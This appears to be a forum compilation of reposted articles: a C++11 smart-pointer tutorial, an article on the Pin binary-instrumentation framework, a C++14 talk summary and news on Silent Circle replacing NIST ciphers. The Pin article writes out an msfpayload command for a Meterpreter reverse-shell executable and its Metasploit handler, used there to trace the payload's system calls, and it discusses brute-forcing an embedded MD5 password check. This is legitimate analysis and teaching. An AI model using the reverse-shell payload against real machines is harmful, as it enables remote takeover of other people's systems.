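        if (!locked || *locked != 42 || s.use_count() != 2) return false;
    }
    return w.expired() && !w.lock();
}

// shared_ptr over new[] needs a deleter that calls delete[]; the counter
// shows the custom deleter ran exactly once when the last owner went away.
static int array_deleter_calls = 0;
bool array_deleter_runs_once() {
    array_deleter_calls = 0;
    {
        std::shared_ptr<int> arr(new int[5], [](int* p) {
            ++array_deleter_calls;
            delete[] p;       // matches new int[5]
        });
        arr.get()[4] = 7;
    }
    return array_deleter_calls == 1;
}
```

Run each function from main and print its result to see the counts the article describes; the strong-cycle case reports 2 survivors, the weak-back-edge case 0.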
int main( )
{
    shared_ptr<Test> sptr( new Test );
    weak_ptr<Test> wptr( sptr );
    shared_ptr<Test> sptr2 = wptr.lock( );
}

Getting the shared_ptr from the weak_ptr increases the strong reference, as said earlier. Now let's see how the cyclic reference issue is resolved using the weak_ptr.

#include <iostream>
#include <memory>
using namespace std;

class B;
class A
{
public:
    A( ) : m_a(5) { };
    ~A( ) { cout<<" A is destroyed"<<endl; }
    void PrintSpB( );
    weak_ptr<B> m_sptrB;
    int m_a;
};

class B
{
public:
    B( ) : m_b(10) { };
    ~B( ) { cout<<" B is destroyed"<<endl; }
    weak_ptr<A> m_sptrA;
    int m_b;
};

void A::PrintSpB( )
{
    if( !m_sptrB.expired() )
    {
        cout<< m_sptrB.lock( )->m_b<<endl;
    }
}

int main( )
{
    shared_ptr<B> sptrB( new B );
    shared_ptr<A> sptrA( new A );
    sptrB->m_sptrA = sptrA;
    sptrA->m_sptrB = sptrB;
    sptrA->PrintSpB( );
}

[h=2]Unique_ptr[/h] This is almost a replacement for the error-prone auto_ptr. unique_ptr follows exclusive ownership semantics, i.e., at any point of time, the resource is owned by only one unique_ptr. When the unique_ptr goes out of scope, the resource is released. If the resource is overwritten by some other resource, the previously owned resource is released. So it guarantees that the associated resource is always released. [h=4]Creation[/h] unique_ptr is created in the same way as shared_ptr, except it has an additional facility for an array of objects.

unique_ptr<int> uptr( new int );

The unique_ptr class provides a specialization to create an array of objects which calls delete[ ] instead of delete when the pointer goes out of scope. The array of objects can be specified as part of the template parameter while creating the unique_ptr. In this way, the programmer does not have to provide a custom deallocator, as unique_ptr does it.

unique_ptr<int[ ]> uptr( new int[5] );

Ownership of the resource can be transferred from one unique_ptr to another by assigning it.
Keep in mind that unique_ptr does not provide copy semantics [copy assignment and copy construction are not possible] but move semantics. In the above case, if upt3 and uptr5 already own some resource, then it will be destroyed properly before owning a new resource. [h=4]Interface[/h] The interface that unique_ptr provides is very similar to the ordinary pointer, but no pointer arithmetic is allowed. unique_ptr provides a function called release which yields the ownership. The difference between release( ) and reset( ) is that release just yields the ownership and does not destroy the resource, whereas reset destroys the resource. [h=3]Which one to use?[/h] It purely depends upon how you want to own a resource. If shared ownership is needed then go for shared_ptr, otherwise unique_ptr. Apart from that, shared_ptr is a bit heavier than unique_ptr because internally it allocates memory to do a lot of bookkeeping like the strong reference, weak reference, etc. But unique_ptr does not need these counters as it is the only owner of the resource. [h=2]Using the code[/h] I have attached the worked out code to explain the details of each pointer. I have added enough comments to each instruction. Ping me back if you find any problems with the code. The weak pointer example demonstrates the problems with shared pointers in the case of cyclic reference and how the weak pointer resolves it. [h=2]History[/h] This is the first version of the article. I'll keep you updated based on feedback and comments. [h=2]License[/h] This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) [h=2]About the Author[/h] syed_babu Software Developer India I have been working as a Senior Software Engineer for 7 years and am interested in MFC and COM programming. Sursa: C++11 Smart Pointers - CodeProject
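The article's code for transferring ownership between unique_ptrs did not survive, and the release( ) versus reset( ) distinction is only described in prose. The following is an added example, not the article's code: the resource type Res (which counts its destructions) and the helper functions are constructed for this illustration. It sticks to C++11, so objects are created with new rather than make_unique.

```cpp
#include <memory>
#include <utility>

// Constructed resource for this example: counts destructions so release()
// and reset() can be told apart.
struct Res {
    static int destroyed;
    int id;
    explicit Res(int i) : id(i) {}
    ~Res() { ++destroyed; }
};
int Res::destroyed = 0;

// Taking a unique_ptr by value means taking ownership. The caller has to
// std::move it in; this is the transfer that auto_ptr performed silently.
int consume(std::unique_ptr<Res> r) {
    return r ? r->id : -1;
}

// Returns {id seen by the callee, whether the caller's pointer is empty
// afterwards}. The moved-from unique_ptr compares equal to nullptr, so the
// auto_ptr-style "use after transfer" is detectable instead of a crash.
std::pair<int, bool> move_transfers_ownership() {
    std::unique_ptr<Res> owner(new Res(7));
    int seen = consume(std::move(owner));
    return std::make_pair(seen, owner == nullptr);
}

// Move-assigning over a unique_ptr that already owns something destroys the
// old resource first (the upt3/uptr5 situation the article mentions).
int assignment_releases_previous() {
    Res::destroyed = 0;
    std::unique_ptr<Res> a(new Res(1));
    std::unique_ptr<Res> b(new Res(2));
    a = std::move(b);            // Res(1) destroyed here; a owns Res(2); b is empty
    return Res::destroyed;       // 1
}

// release() hands the raw pointer back without destroying it; reset()
// destroys. The released pointer is re-adopted so nothing leaks.
bool release_vs_reset() {
    Res::destroyed = 0;
    std::unique_ptr<Res> a(new Res(3));
    Res* raw = a.release();                       // a is empty, nothing destroyed
    bool ok = (a == nullptr) && Res::destroyed == 0 && raw->id == 3;
    std::unique_ptr<Res> b(raw);                  // re-adopt the raw pointer
    b.reset();                                    // destroys Res(3)
    return ok && (b == nullptr) && Res::destroyed == 1;
}

// The array specialization uses delete[] and exposes operator[].
int array_specialization_sum() {
    std::unique_ptr<int[]> arr(new int[5]);
    int sum = 0;
    for (int i = 0; i < 5; ++i) {
        arr[i] = i + 1;
        sum += arr[i];
    }
    return sum;   // 15
}
```

The point to notice is that every transfer is spelled out with std::move at the call site: a plain `Fun(p)` with a unique_ptr does not compile, which is exactly the auto_ptr crash from Issue 1 turned into a compile error.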
-
Pin: Dynamic Binary Instrumentation Framework

Dejan Lukan
September 30, 2013

Introduction

Pin is a DBI framework for the IA-32 and x86-64 architectures, which can be used for dynamic analysis of a binary program at run time. When using the Pin framework to build tools, you're actually creating pintools; you can think of Pin as an abstraction layer that abstracts away the underlying details of dynamic analysis [1]. Pin does that by reading the process's code, saving it into memory and inserting its own instructions while generating the code. Pin then executes the generated code, which will execute the code of the main program plus the additional inserted instructions.

Pin can be used to insert C/C++ code at arbitrary places in the dynamically executed executable; you can either start a new process directly from the pintool (our own program that uses the Pin framework) or attach to an already running process. When developing the pintool, you're actually telling Pin how to generate the code from the main executable: you're influencing the code addition/modification process. When you run a program within a pintool, it will stop the program execution at the first instruction and modify the code generation process. Then it will generate the code it will later execute by using one of the following modes [2]:

Trace Instrumentation: the pintool processes one trace at a time, starting from the current instruction and ending with an unconditional branch (including calls and returns); this is done with the TRACE_AddInstrumentFunction API call.
Instruction Instrumentation: the pintool processes one instruction at a time; this is done with the INS_AddInstrumentFunction API call.
Image Instrumentation: the pintool processes an entire image, where Pin can iterate over the sections of the program, the routines in a section or the instructions in a routine. You can insert additional instructions before/after a routine is executed or before/after an instruction is executed. Here you have to use the IMG_AddInstrumentFunction API call.
Routine Instrumentation: the pintool processes one routine, where Pin can iterate over the instructions of the routine. Additional instructions can be inserted before/after routine execution or before/after instruction execution. Here you have to use the RTN_AddInstrumentFunction API call.

There are a couple of callback functions that you can use with the Pin framework, presented below:

TRACE_AddInstrumentFunction: directly corresponds to the Trace Instrumentation mode
INS_AddInstrumentFunction: directly corresponds to the Instruction Instrumentation mode
IMG_AddInstrumentFunction: directly corresponds to the Image Instrumentation mode
RTN_AddInstrumentFunction: directly corresponds to the Routine Instrumentation mode
PIN_AddFiniFunction
PIN_AddDetachFunction

The callback functions mentioned above have the prototypes presented below, where the fun argument represents the function to be called and val represents the parameter to be passed to the fun function [2]:

INS_AddInstrumentFunction (INSCALLBACK fun, VOID *val)
TRACE_AddInstrumentFunction (TRACECALLBACK fun, VOID *val)
RTN_AddInstrumentFunction (RTNCALLBACK fun, VOID *val)
IMG_AddInstrumentFunction (IMGCALLBACK fun, VOID *val)
PIN_AddFiniFunction (FINICALLBACK fun, VOID *val)
PIN_AddDetachFunction (DETACHCALLBACK fun, VOID *val)

Since the val parameter is a pointer to VOID, you can basically pass any structure to the callback function. Some of the things that you can pass to the callback functions are presented below (summarized after [2]):

Instruction Pointer
Value of Register
Current value of Registers
Effective Address of Memory Operations
Constants
Number of bytes of Read Memory
Number of bytes of Written Memory
Function Result
…

The function abbreviations are as follows, provided for clarity of the discussion:

IMG : image
SEC : section in an image
RTN : routine in a section
INS : instruction in a routine
SYM : symbol object

There are also various other functions you can use, some of which are presented below:

PIN_InitSymbols: initialize the symbols which will be used by the Pin framework.
INS_Delete: remove the instruction.
INS_RewriteMemoryOperand: change the memory value accessed by the instruction.
PIN_AddSyscallEntryFunction: do some action when a system call occurs; you can use this to print which system call was called and all of the parameters passed to it.
PIN_AddSyscallExitFunction: do some action when exiting from a system call; you can use this to print the return value of the system call.
PIN_GetSyscallArgument: you can call this function to get the arguments of a system call; the important thing to note is that you must pass it the SYSCALL_STANDARD object, which declares where the arguments of the system call are stored. Note that depending on the calling convention used, they can be stored in registers or on the stack [4].

The Inscount0 Example

You can download Pin from here and select the appropriate version. I downloaded the pin-2.12-58423-gcc.4.4.7-linux.tar.gz file and extracted its contents. After that I changed the directory to source/tools/ManualExamples/ and built the inscount0 example as presented in [2]. For reference, the executed commands can be seen below.
# tar xvzf pin-2.12-58423-gcc.4.4.7-linux.tar.gz
# cd pin-2.12-58423-gcc.4.4.7-linux/source/tools/ManualExamples/
# make inscount0.test

Now the inscount0 example is built and inscount0.so is stored in the newly created obj-intel64/ folder. Now you can run the pin command by passing it the path to inscount0.so. Let's run the /bin/ls command with pin as presented below.

# pin -t obj-intel64/inscount0.so -- /bin/ls

The inscount0 example counts the number of executed instructions by increasing a counter by 1 before every executed instruction. Once the program exits, pin saves the results in the inscount.out file, which contains the number of executed instructions; in our case there were 563175 executed instructions, as can be seen below.

# cat inscount.out
Count 563175

Let's now present the actual program that was used to calculate the number of executed instructions, which can be seen below.
#include <iostream>
#include <fstream>
#include "pin.H"

ofstream OutFile;

// The running count of instructions is kept here
// make it static to help the compiler optimize docount
static UINT64 icount = 0;

// This function is called before every instruction is executed
VOID docount() { icount++; }

// Pin calls this function every time a new instruction is encountered
VOID Instruction(INS ins, VOID *v)
{
    // Insert a call to docount before every instruction, no arguments are passed
    INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)docount, IARG_END);
}

KNOB<string> KnobOutputFile(KNOB_MODE_WRITEONCE, "pintool",
    "o", "inscount.out", "specify output file name");

// This function is called when the application exits
VOID Fini(INT32 code, VOID *v)
{
    // Write to a file since cout and cerr maybe closed by the application
    OutFile.setf(ios::showbase);
    OutFile << "Count " << icount << endl;
    OutFile.close();
}

/* ===================================================================== */
/* Print Help Message                                                    */
/* ===================================================================== */

INT32 Usage()
{
    cerr << "This tool counts the number of dynamic instructions executed" << endl;
    cerr << endl << KNOB_BASE::StringKnobSummary() << endl;
    return -1;
}

/* ===================================================================== */
/* Main                                                                  */
/* ===================================================================== */
/*   argc, argv are the entire command line: pin -t <toolname> -- ...    */
/* ===================================================================== */

int main(int argc, char * argv[])
{
    // Initialize pin
    if (PIN_Init(argc, argv)) return Usage();

    OutFile.open(KnobOutputFile.Value().c_str());

    // Register Instruction to be called to instrument instructions
    INS_AddInstrumentFunction(Instruction, 0);

    // Register Fini to be called when the application exits
    PIN_AddFiniFunction(Fini, 0);

    // Start the program, never returns
    PIN_StartProgram();

    return 0;
}

In the beginning of the code you have the icount variable that holds the number of executed instructions; note that the variable is 64-bit, which means it can represent numbers from 1 to 2^64, which is needed to represent the instruction count of longer programs where regular 32-bit integers are not enough. The docount() function increases the icount variable by 1 each time an instruction is executed. You can see what the program does if you look at the main function, where you're first initializing Pin. After that you're registering the function to be called before each and every instruction is executed: the Instruction function is called every time. The Instruction function calls INS_InsertCall to insert an additional call to the docount() function before executing each instruction. Additionally, in the main function, you also have PIN_AddFiniFunction, which registers the function that will be called when the application exits: the Fini function. That function writes the number of executed instructions into the inscount.out file. At the end of the main() function you must also call PIN_StartProgram to actually start the program and inject the calls to the docount() function before each and every instruction. Now let's also look at how you can compile the same example under Windows, because you'll need it later on.
First, you must install Visual C++, which is a requirement if you don't want to bother yourself with MinGW/Cygwin; I won't cover the installation here, since it should be fairly self-explanatory. After the installation of Visual C++, you need to open the Visual Studio project file in the MyPinTool directory of the extracted pin archive, as shown below. By using this you can easily create a new tool with Visual Studio. Once opened, you can change the MyPinTool.cpp source code and copy the inscount0 example in there. The build process should succeed without a problem, which should give you the MyPinTool.dll library, which you can use for counting the number of instructions of some program. I copied the DLL into the C:\pin\ directory where pin.exe is also located. Then I executed the “pin.exe -t MyPinTool.dll -- C:\Windows\System32\calc.exe” command, which opens a new instance of the calculator as shown below. After you calculate some equations with the calculator, you can close it and pin.exe will also be closed automatically. If you remember correctly from the previous example, the number of executed instructions should be written to the inscount0.txt file. Below you can see that 133875503 instructions were executed during the calculator run, which seems like quite a lot, but computers can handle that without a problem.

The Meterpreter Example

In this example, you'll first create a Meterpreter executable that connects back to our machine and launch it on a Windows operating system to prove that it works. Then, you'll download the pin framework for Windows and use it to start the Meterpreter executable. The point of the exercise is printing all the shared libraries the Meterpreter uses while connecting back to our computer.
To create the Meterpreter executable, you can use the msfpayload command as presented below:

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > meterpreter.exe
Created by msfpayload (Penetration Testing Software | Metasploit).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}

To test whether that executable connects back to our Linux machine, you first have to start a handler with the “msfconsole -r meterpreter.rb” command, where meterpreter.rb is outlined below.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 0.0.0.0
set ExitOnSession false
exploit -j -z

After the handler has been started, a new port 4444 should be open on our Linux machine, waiting for the Meterpreter executable to connect. When the Meterpreter executable connects to the handler, a new session is spawned, which you can enter by issuing the “sessions -i 1” command. Below we entered the newly spawned Meterpreter session and executed the sysinfo command to prove that the Meterpreter session is working:

> sysinfo
Computer : ADMIN-PC
OS : Windows 7 (Build 7600).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32

So far, you've established only that Meterpreter indeed connects back to the handler, but you don't have a clue which system calls are actually being called.
In order to print each and every system call used by Meterpreter, you need to create a pintool that calls PIN_AddSyscallEntryFunction/PIN_AddSyscallExitFunction, which have the following syntax:

PIN_AddSyscallEntryFunction(SYSCALL_ENTRY_CALLBACK fun, VOID *val);
PIN_AddSyscallExitFunction(SYSCALL_EXIT_CALLBACK fun, VOID *val);

Notice that you're passing the parameter fun into the above functions, which is actually the function that is going to be called before and after the system call is executed.

Let's first count the number of instructions executed when meterpreter.exe gets executed. If you start meterpreter.exe with pin, wait for it to connect back to create a reverse shell and then kill meterpreter.exe from the task manager, inscount.out won't contain the number of instructions executed, because the program hasn't exited cleanly. You can see that in the picture below, where the inscount.out file doesn't contain anything.

After that I added some code to be able to monitor system calls. I've added the PIN_AddSyscallEntryFunction and PIN_AddSyscallExitFunction calls, which instruct Pin to call the specified functions before and after entering the system call. The whole code can be seen below, where you can see exactly how the SyscallEntry and SyscallExit functions are set. In the SyscallEntry function you're saving the function name and the first three arguments into the output file, and in SyscallExit you're saving the syscall's return value. Note that PIN_GetSyscallArgument automatically knows whether the argument is stored in a register or on the stack, so you don't have to worry about that; it's abstracted away by the Pin framework.
#include <iostream>
#include <fstream>
#include <cstdio>
#include "pin.H"

ofstream out;

// Called before every system call: log its number and first three arguments
VOID SyscallEntry(THREADID tid, CONTEXT *ctx, SYSCALL_STANDARD std, VOID *v)
{
    ADDRINT num = PIN_GetSyscallNumber(ctx, std);
    printf("System call: %d\n", (int)num);
    // argument indices 0, 1 and 2 select the first three syscall arguments;
    // Pin resolves whether each one lives in a register or on the stack
    ADDRINT arg1 = PIN_GetSyscallArgument(ctx, std, 0);
    ADDRINT arg2 = PIN_GetSyscallArgument(ctx, std, 1);
    ADDRINT arg3 = PIN_GetSyscallArgument(ctx, std, 2);
    out << " Syscall Number: " << num << "(" << arg1 << ", " << arg2 << ", " << arg3 << ")" << endl;
}

// Called after every system call: log its return value
VOID SyscallExit(THREADID tid, CONTEXT *ctx, SYSCALL_STANDARD std, VOID *v)
{
    out << "[exit] Return: " << PIN_GetSyscallReturn(ctx, std) << endl;
}

KNOB<string> KnobOutputFile(KNOB_MODE_WRITEONCE, "pintool",
    "o", "inscount.out", "specify output file name");

VOID Fini(INT32 code, VOID *v)
{
    out.setf(ios::showbase);
    out.close();
}

INT32 Usage()
{
    cerr << "This tool counts the number of dynamic instructions executed" << endl;
    cerr << endl << KNOB_BASE::StringKnobSummary() << endl;
    return -1;
}

int main(int argc, char * argv[])
{
    if (PIN_Init(argc, argv)) return Usage();

    out.open(KnobOutputFile.Value().c_str(), ios::out | ios::app);

    /* functions to get called on system calls */
    PIN_AddSyscallEntryFunction(SyscallEntry, 0);
    PIN_AddSyscallExitFunction(SyscallExit, 0);

    PIN_AddFiniFunction(Fini, 0);
    PIN_StartProgram();
    return 0;
}

You can simply run the program with the “pin.exe -t MyPinTool.dll -- meterpreter.exe” command, as can be seen below. After you've pressed Ctrl-C to kill the pin and meterpreter processes, the inscount.txt file will be populated with all the system calls that happened during meterpreter execution. In the picture below you can see the “” lines that represent the system call entry functions, where the system call number is printed as well as three of its arguments.
You've just seen that the Pin framework captures every system call and gives us a chance to react to it; we chose to only write some text into the .txt file, but you might do something totally different; it all depends on your needs. You might catch only the connect system call and change the host and port to which meterpreter.exe connects; Pin can absolutely be used for that or for even more complicated things.

You can also notice that only system call numbers were printed. If you would like to print the actual names, you would need to traverse the export directory of the ntdll.dll library, compare each system call number with the given number and, once found, print the name of the function. When traversing the export directory, you should be using AddressOfNames, AddressOfFunctions, AddressOfNameOrdinals and NumberOfNames. You can see that this quickly gets complicated even with Pin on our side helping us. Note that Pin doesn't support syscall id to name conversion as far as I know.

You can also add the following code to the project, and also “INS_AddInstrumentFunction(Instruction, 0);” to the main function, which will invoke the Instruction function on every executed instruction; that function will then write the instruction to the inscount.txt text file.

VOID Instruction(INS ins, VOID *v)
{
    out << "[INS] " << INS_Disassemble(ins) << endl;
}

After the execution of Meterpreter, the start of the executed instructions will look like presented in the picture below. There you can clearly see all the executed instructions that were needed to spawn the reverse Meterpreter shell.

Taint Analysis with Pin

Here I'll briefly present a summary of the article written by Jonathan Salwan, who used Pin for taint analysis; his blog post is presented at [3].
For any of you who don't know what taint analysis is: it's a method of detecting vulnerabilities in programs by marking registers and memory locations which can be reached by user-controlled input data as tainted. This is useful because if the program later uses the tainted values stored in those registers or memory locations in a specific way, this can be a possible security vulnerability. But how can a program use tainted values to introduce a security vulnerability? For example, if you can change the value on the stack where EIP was saved, the function will jump to that location when returning. Therefore, if you overwrite that location with an arbitrary value, you can jump to an arbitrary location in memory, which is a typical stack overflow vulnerability.

When marking memory locations as tainted, you need to decide what the smallest unit of tainted memory information will be:

1 bit: useful if there are operations in the code that work with bits (not very common)
1 byte: useful whenever the code references the al, ah or ax registers, which are the lower 8 bits, higher 8 bits and lower 16 bits of the EAX register.
4 bytes: useful when the code only operates with normal registers, which hold 4 bytes of data.

Whenever you decide what you would like to do, keep in mind that you need to reserve an additional amount of memory to store the locations of tainted memory blocks. Normally, you would have a table representing the whole memory space of the application where you would store tainted and non-tainted memory blocks, but a great optimization is to store just the tainted memory blocks in a linked list or similar structure. If you would like to know more about taint analysis with Pin, you can read about it in a great article at [3], where everything is explained in detail.

In-Memory Fuzzing

There's another great article about in-memory fuzzing, written by Jonathan Salwan and accessible at [6].
In-memory fuzzing can be used to test a portion of the code in memory; for example, let's suppose the program has an embedded MD5 hash, which is used to check whether the user should be logged into the system or not. The source code of a very simple C program can be seen below, where hash contains the MD5 hash of the word ‘passwd’ and the str variable points to the inputted argument. The program then calculates the MD5 of the inputted password and compares it to the embedded MD5 hash. If the hashes match, it prints the success message, otherwise the error message.

#include "md5.h"   /* md5() returns the hex digest as a std::string */
#include <cstdio>
#include <cstdlib>
#include <string>
using namespace std;

int main(int argc, char **argv)
{
    /* hash of 'passwd' and inputted argument password */
    const char *hash = "76a2173be6393254e72ffa4d6df1030a";
    if (argc < 2) {
        printf("Usage: %s <password>\n", argv[0]);
        return 1;
    }
    const char *str = argv[1];

    /* check if md5 matches the inputted password */
    if (md5(str) == hash) {
        printf("Success: the entered password was right.\n");
    } else {
        printf("Error: you didn't enter the right password.\n");
    }
    system("PAUSE");
    return 0;
}

Let's first check whether the MD5 hash actually matches the ‘passwd’ string, so you won't be working blindly here. It can be done very easily with the echo command, passing it the ‘passwd’ string; note that you have to use the -n argument, which suppresses the terminating newline at the end of the string, which is needed for the md5sum tool to print the right MD5 hash. In the output below, you can see that the hash is correct.

# echo -n "passwd" | md5sum
76a2173be6393254e72ffa4d6df1030a -

Let's compile and run the program in Visual Studio to see what you get. In Project Properties – Configuration Properties – Debugging, you have to input the ‘passwd’ string in “Command Arguments”, so you'll be passing the right command line argument to the program. If the password is correct, the following will be printed to the command line. If the password doesn't match, the printed text will be as seen below.
There you see it; multiple times I stumbled upon such a problem in penetration testing of other applications. But still, the problem is the same, just the tools used are different. There are multiple ways to solve the problem:

Python Script: you can program a simple Python script to brute force the login password until the hash matches. The problem is that you don't know in advance what the binary is doing, so brute forcing the input argument seems like the last resort you want to use if everything else fails.
FindMyHash: you can use the findmyhash.py script, which connects to various sites, passing them the embedded hash. They then try to crack the hash and report back on its status. If you want to use this approach, you need to open the binary with a debugger, understand the instructions and pull out the MD5 hash. This method requires a lot more work than writing the Python script, but the problem should be solved sooner.
PIN Framework: you can use the Pin framework to write a wrapper around the relevant instructions in the binary program to brute force the password in memory. This approach is the coolest of them all and we will take a look at it here.

We won't talk about the first and second solutions in more detail, since they are self-explanatory. Rather, we'll describe the third, Pin framework, method in detail. First you should load checkmd5.exe into IDA Pro for analysis. Right at the beginning, IDA Pro will correctly analyze the program, which can be seen below; on the left side there's a block of code that gets executed when the hashes match, and the code block on the right side gets executed when the hashes don't match. The code right before the one presented above must decide which code block to execute. That code can be seen below; note that I renamed a few functions to make it clearer; those functions are: std__allocate, std__allocate_0, std__equals and std__compare.
I commented the code above to make it clearer, but essentially it's just doing the same as our C++ program, so nothing new there. Before actually running the program, you must define the password that will be passed to it, which can be done by clicking on Debugger – Process options, also seen below. Notice that we inputted the passwd string into the Parameters input field, which is exactly the password that will correctly instruct the program to print “Success: the entered password was right.” If you run the program now, it will print the success message, since we inputted the right password. If you want to see a similar complete solution you can take a look at [6], where Jonathan Salwan explains it in detail. The implementation of brute forcing the MD5 is left as an exercise to the reader, but he/she should have all the details of how to do that.

Conclusion

You've seen that you can do a lot of interesting stuff with the Pin framework; you can follow each instruction, function, system call, etc. By using Pin you have complete control over the dynamically executing program. Therefore, you can use it for various tasks when you would like to quickly do some actions on a running program, like brute forcing an MD5 password with Pin instead of using other methods.

References:

[1] Pin – A Dynamic Binary Instrumentation Tool, Sion Berkowits (Intel), Pin - A Dynamic Binary Instrumentation Tool | Intel® Developer Zone.
[2] Pin 2.12 User Guide, Pin: Pin 2.12 User Guide.
[3] Jonathan Salwan, Taint analysis and pattern matching with Pin, shell-storm | Taint analysis and pattern matching with Pin.
[4] Malware Unpacking Level: Pintool, Malware Unpacking Level: Pintool | Development & Security.
[5] Pin Modules, Pin: Module Index.
[6] In-Memory fuzzing with Pin, shell-storm | In-Memory fuzzing with Pin.

Source: Pin: Dynamic Binary Instrumentation Framework
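The byte-granularity taint tracking described in the Taint Analysis section above, as an added example that is neither the article's nor Jonathan Salwan's code: a sparse shadow-memory map that stores only the tainted bytes (the optimization the text recommends over a table mirroring all of memory), driven by a constructed, simplified instruction trace instead of Pin callbacks, and flagging a ret whose saved return address was overwritten with input bytes. The addresses 0x1000 (input), 0x2000 (4-byte stack buffer) and 0x2004 (saved return address) and the trace itself are constructed for the demonstration.

```cpp
#include <cstdint>
#include <cstdio>
#include <iterator>
#include <map>
#include <set>
#include <string>
#include <vector>

// Sparse shadow memory at 1-byte granularity: only tainted bytes are stored, as
// sorted, merged [start, end) intervals, not a table mirroring all of memory.
class TaintMap {
public:
    void taint(uint64_t addr, size_t len) {
        if (len == 0) return;
        uint64_t start = addr, end = addr + len;
        auto it = ranges_.lower_bound(start);
        if (it != ranges_.begin() && std::prev(it)->second >= start) it = std::prev(it);
        while (it != ranges_.end() && it->first <= end) {  // absorb overlapping/touching
            start = it->first < start ? it->first : start;
            end = it->second > end ? it->second : end;
            it = ranges_.erase(it);
        }
        ranges_[start] = end;
    }
    void untaint(uint64_t addr, size_t len) {
        if (len == 0) return;
        uint64_t start = addr, end = addr + len;
        auto it = ranges_.lower_bound(start);
        if (it != ranges_.begin() && std::prev(it)->second > start) it = std::prev(it);
        while (it != ranges_.end() && it->first < end) {  // cut [start, end) out, keep the rest
            uint64_t rs = it->first, re = it->second;
            it = ranges_.erase(it);
            if (rs < start) ranges_[rs] = start;
            if (re > end) ranges_[end] = re;
        }
    }
    bool isTainted(uint64_t addr, size_t len) const {  // any byte of [addr, addr+len)?
        if (len == 0) return false;
        auto it = ranges_.upper_bound(addr);
        if (it != ranges_.begin() && std::prev(it)->second > addr) return true;
        return it != ranges_.end() && it->first < addr + len;
    }
    size_t rangeCount() const { return ranges_.size(); }
private:
    std::map<uint64_t, uint64_t> ranges_;
};

// A constructed, simplified instruction trace: the operands a pintool's
// instruction callback would see, reduced to what matters for taint.
enum class Op { Load, Store, Ret };
struct Ins {
    Op op;
    std::string reg;  // register loaded into (Load) or stored from (Store)
    uint64_t addr;    // memory operand (Load, Store) or saved return slot (Ret)
    size_t size;      // operand width in bytes
};

struct Analysis {
    TaintMap mem;
    std::set<std::string> regs;    // registers currently holding tainted data
    std::vector<uint64_t> alerts;  // return slots found tainted at a ret
};

// Propagate taint from the user-controlled input bytes through the trace and
// report every ret whose saved return address was overwritten with tainted data.
Analysis run(const std::vector<Ins>& trace, uint64_t inputAddr, size_t inputLen) {
    Analysis a;
    a.mem.taint(inputAddr, inputLen);
    for (const Ins& i : trace) {
        switch (i.op) {
        case Op::Load:   // reg <- [mem]: the register takes the bytes' state
            if (a.mem.isTainted(i.addr, i.size)) a.regs.insert(i.reg); else a.regs.erase(i.reg);
            break;
        case Op::Store:  // [mem] <- reg: the bytes take the register's state
            if (a.regs.count(i.reg)) a.mem.taint(i.addr, i.size); else a.mem.untaint(i.addr, i.size);
            break;
        case Op::Ret:    // ret pops the saved return address stored at i.addr
            if (a.mem.isTainted(i.addr, i.size)) a.alerts.push_back(i.addr);
            break;
        }
    }
    return a;
}

// Constructed trace: n input bytes at 0x1000 are copied, 4 at a time, into a
// 4-byte stack buffer at 0x2000 whose saved return address sits at 0x2004.
std::vector<Ins> copyTrace(size_t n) {
    std::vector<Ins> t;
    for (uint64_t off = 0; off < n; off += 4) {
        t.push_back({Op::Load, "eax", 0x1000 + off, 4});
        t.push_back({Op::Store, "eax", 0x2000 + off, 4});
    }
    t.push_back({Op::Ret, "", 0x2004, 4});
    return t;
}

int main() {
    size_t overflow = run(copyTrace(8), 0x1000, 8).alerts.size();  // 8 bytes into 4: 1
    size_t inBounds = run(copyTrace(4), 0x1000, 8).alerts.size();  // fits: 0
    std::printf("overflow alerts: %zu, in-bounds alerts: %zu\n", overflow, inBounds);
    return 0;
}
```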
-
[h=1]C++14: Through the Looking Glass[/h]

Date: September 5, 2013 from 1:15PM to 2:30PM
Day 2 009
Speakers: Michael Wong

“The time has come,” the ISO said,
“To talk of many things:
Of move-capture—and literals—
Of making lambdas sing—
And why deduction is so hot—
And if digits should grow wings?”

So have you heard of the next C++ Standard? No, it is not C++11. Even though C++11 has just been ratified, C++14 will likely replace C++11 by next year. By now, we have enough experience with C++11 to know where we are missing various fingers and toes, such as:

Why do we not have move capture in lambdas?
How about some real user-defined literal suffixes?
Why did we stop with monomorphic lambdas?
If lambda returns can be deduced, why not normal functions?
Could we get digit separators?
C++14 will be more than a bug-fix release, and will contain some important enhancements on top of C++11. It will remove some of the major annoyances from C++11 that we already know of. But more importantly, how will this change the language, the library and some important idioms?

Source: C++14: Through the Looking Glass | GoingNative 2013 | Channel 9
-
Silent Circle Moving Away From NIST Ciphers in Wake of NSA Revelations

by Dennis Fisher

The first major domino to fall in the crypto world after the NSA leaks by Edward Snowden began was the decision by Lavabit, a secure email provider, to shut down in August rather than comply with a government order. Shortly thereafter, Silent Circle, another provider of secure email and other services, said it was discontinuing its Silent Mail offering, as well. Now, Silent Circle is going a step further, saying that it plans to replace the NIST-related cipher suites in its products with independently designed ones, not because the company distrusts NIST, but because its executives are worried about the NSA's influence on NIST's development of ciphers in the last couple of decades.

Jon Callas, one of the founders of Silent Circle and a respected cryptographer, said Monday that the company has been watching all of the developments and revelations coming out of the NSA leaks and has come to the decision that it's in the best interest of the company and its customers to replace the AES cipher and the SHA-2 hash function and give customers other options. Those options, Callas said, will include non-NIST ciphers such as Twofish and Skein.

“At Silent Circle, we've been deciding what to do about the whole grand issue of whether the NSA has been subverting security. Despite all the fun that blogging about this has been, actions speak louder than words. Phil [Zimmermann], Mike [Janke], and I have discussed this and we feel we must do something. That something is that in the relatively near future, we will implement a non-NIST cipher suite,” Callas wrote in a blog post explaining the decision.

Twofish is a cipher suite written by Bruce Schneier and it was one of the finalists during the AES competition, but lost out to the Rijndael algorithm.
It has been resistant to cryptanalysis thus far, and Callas said it also has the advantage of being an easy replacement for AES in Silent Circle's products. The company also will be replacing SHA-2, an older NIST hash function, with Skein, which was a finalist in the recently completed SHA-3 competition.

